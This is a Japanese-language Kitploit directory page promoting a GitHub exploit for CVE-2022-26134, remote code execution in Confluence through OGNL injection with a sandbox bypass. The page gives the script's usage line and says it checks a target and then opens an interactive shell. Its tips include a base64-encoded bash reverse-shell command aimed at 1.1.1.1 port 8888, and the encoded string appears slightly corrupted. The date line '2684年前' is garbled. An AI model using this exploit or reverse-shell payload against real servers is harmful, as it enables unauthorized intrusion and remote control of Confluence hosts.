Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26134 — [CVE-2022-26134]Confluence OGNL 式インジェクションによるサンドボックス回避を伴うRCE. | Kitploit
ツール/GitHubGitHub/sncker/cve-2022-26134
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubsncker/cve-2022-26134

CVE-2022-26134

[CVE-2022-26134]Confluence OGNL 式インジェクションによるサンドボックス回避を伴うRCE.

リポジトリを見る
2684年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26134

Confluence OGNL 式注入 RCE (CVE-2022-26134) の PoC および Exp

更新

サンドボックスバイパスを追加、高バージョン対応。

使用法

root@kitploit:~
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/

このスクリプトは自動でターゲットが脆弱かどうかをチェックし、脆弱であれば擬似インタラクティブシェルを起動します。

Linuxでのテスト:
linux

Windowsでのテスト:
windows

終了するには 'q' を入力してください。

いくつかのヒント

コマンドパラメータは直接 runtime.exec メソッドに渡されるため、シェルのコンテキストを持ちません。
そのため、
Windowsでは、dir などの一部のコマンドを直接実行できません。その場合は cmd.exe /c dir を使用してください。
Linuxでは、特殊記号が有効にならない場合があります。リバースシェルのような特殊記号を含むコマンドを実行する必要がある場合は、base64 エンコードしてから bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i} を使用してください。

ツールをダウンロード